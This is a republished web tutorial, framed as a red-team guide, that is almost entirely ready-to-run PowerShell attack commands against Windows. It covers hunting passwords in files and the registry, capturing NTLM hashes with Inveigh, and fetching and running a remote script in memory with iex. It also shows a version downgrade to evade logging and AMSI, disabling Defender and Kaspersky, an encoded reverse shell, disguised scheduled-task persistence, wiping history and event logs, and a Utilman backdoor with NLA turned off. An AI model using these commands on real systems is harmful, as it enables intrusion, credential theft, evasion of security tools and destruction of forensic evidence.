PowerShell Red Team Guide: Core Hacking Skills Explained

This tutorial walks through essential PowerShell techniques for red‑team operations, covering command basics, credential harvesting, execution‑policy bypass, file download, in‑memory payloads, downgrade attacks, anti‑AV evasion, persistence, hidden execution, command‑history handling, scheduled‑task abuse, session management, log cleaning, and a stealthy Utilman backdoor.

Black & White Path
Black & White Path
Black & White Path
PowerShell Red Team Guide: Core Hacking Skills Explained

Why PowerShell Is Favored by Red Teams

Pre‑installed and Microsoft‑signed : native binary, often ignored by AV.

Feature‑rich : remote sessions, credential collection, system configuration, in‑memory payload execution.

Stealthy : can run without writing files to disk.

Core PowerShell Commands for Linux Users

File viewing and navigation equivalents: PS > type example.txt Recursive directory tree: PS > tree /F Variable handling for non‑ASCII paths:

PS > $items = Get-ChildItem
PS > cd $items[4].FullName

Credential Harvesting – First Step to Lateral Movement

findstr – Native Password Hunter

PS > findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.gif *.ps1 *.yml

/S = recursive, /I = case‑insensitive, /M = list matching file names only.

Registry – Additional Credential Store

PS > reg query HKLM /f password /t REG_SZ /s
PS > reg query HKCU /f password /t REG_SZ /s
PS > reg query "HKCU\Software\ORL\WinVNC3\Password"
PS > reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
PS > reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP"
PS > reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"

LaZagne – General‑Purpose Credential Extractor

Run LaZagne from PowerShell to dump passwords from browsers, email clients, Wi‑Fi profiles, FTP tools and databases.

SMB Hash Capture – NTLMv1/v2 Theft

Serve a malicious .lnk file to force Windows to send NTLM hashes to a listener. Capture with Inveigh:

PS > powershell -ep bypass
PS > . .\Inveigh.ps1
PS > Invoke-Inveigh -ConsoleOutput Y -NBNS Y -HTTPS Y -PROXY Y

Crack captured hashes with Hashcat mode 5600.

Execution Policy Bypass & File Download

Bypass for the current session: PS > powershell -ep bypass Permanent bypass (requires admin):

PS > Set-ExecutionPolicy Bypass -Scope LocalMachine -Force

Download scripts:

PS > iwr https://raw.githubusercontent.com/xxx/script.ps1 -OutFile script.ps1
PS > wget https://raw.githubusercontent.com/xxx/script.ps1 -O script.ps1

In‑memory execution without a file:

PS > iex (Invoke-WebRequest -Uri 'http://pastebin.com/raw/xxx')

Downgrade Attack

Run an older PowerShell version (e.g., 2.0) to bypass script block logging, transcription and AMSI:

PS > powershell -version 2

Anti‑Virus Evasion

Check Defender status: PS > Get-Service -Name windefend Disable Windows Defender:

PS > Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableNetworkProtection AuditMode -MAPSReporting Disabled -SubmitSamplesConsent NeverSend -EnableControlledFolderAccess Disabled

Stop Kaspersky services (local install):

PS > Stop-Service -Name KAVFS,kavfsslp,klnagent -Force

Base64 Encoding & Reverse Shell

PS > [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('Write-Host "Hackers-Arise!"'))
PS > powershell -e "<base64>"

Encoded payload can be customized on revshells.com and executed to obtain a remote shell.

Profile Persistence – Auto‑Run on Startup

PS > Add-Content -Path $Profile -Value "C:\Windows\Temp\script.ps1"
PS > Set-ExecutionPolicy Bypass -Scope LocalMachine -Force

Hidden Execution

Run PowerShell silently:

PS > Start-Process powershell.exe -WindowStyle Hidden -ArgumentList "-ExecutionPolicy Bypass -File C:\Windows\Temp\script.ps1"

Suppress profile loading:

PS > powershell.exe -NoProfile -Command "Write-Output 'Hackers-Arise!'"

Command History & Process Command Line

View recent PowerShell history (default 50 entries):

PS > Get-Content "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt"

Overwrite the history file to erase traces:

PS > Set-Content "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -Value ""

List each process’s command line (useful for finding credentials, IPs, etc.):

PS > gwmi win32_process | select CommandLine

Scheduled Tasks – Persistence & Privilege Escalation

Export all tasks and search for high‑privilege entries:

PS > schtasks /query /fo LIST /v > schtask.txt

Create a malicious task:

PS > schtasks /create /tn "Windows Update Service" /tr "C:\Windows\Temp\hackers-arise.exe" /sc hourly /mo 3 /ru System

Run, query, or delete the task:

PS > schtasks /run /tn "Windows Update Service"
PS > schtasks /query /tn "Windows Update Service"
PS > schtasks /delete /tn "Windows Update Service" /f

Session Management & Log Cleaning

List active user sessions: PS > quser # or qwinsta Force logoff of a specific user:

PS > logoff ((quser | Where-Object { $_ -match 'username' }) -split '\s+' )[2]

Delete a user’s profile directory after terminating the session: PS > cmd.exe /c "rd /s /q C:\Users\username" Clear event logs to hide activity:

PS > Clear-EventLog Security,System,Application; "Windows PowerShell","Microsoft-Windows-PowerShell/Operational","Microsoft-Windows-WMI-Activity/Operational" | ForEach-Object { & "$env:windir\System32\wevtutil.exe" cl $_ }

Utilman Backdoor – Hidden High‑Privilege Shell at Login

Replace the Utilman.exe debugger with cmd.exe (requires SYSTEM):

PS > reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /v Debugger /t REG_SZ /d "C:\Windows\System32\cmd.exe" /f

Disable Network Level Authentication to allow password‑less RDP:

PS > reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
Original Source

Signed-in readers can open the original source through BestHub's protected redirect.

Sign in to view source
Republication Notice

This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contactadmin@besthub.devand we will review it promptly.

PersistenceWindows SecurityPowerShellRed TeamCredential HarvestingExecution Bypass
Black & White Path
Written by

Black & White Path

We are the beacon of the cyber world, a stepping stone on the road to security.

0 followers
Reader feedback

How this landed with the community

Sign in to like

Rate this article

Was this worth your time?

Sign in to rate
Discussion

0 Comments

Thoughtful readers leave field notes, pushback, and hard-won operational detail here.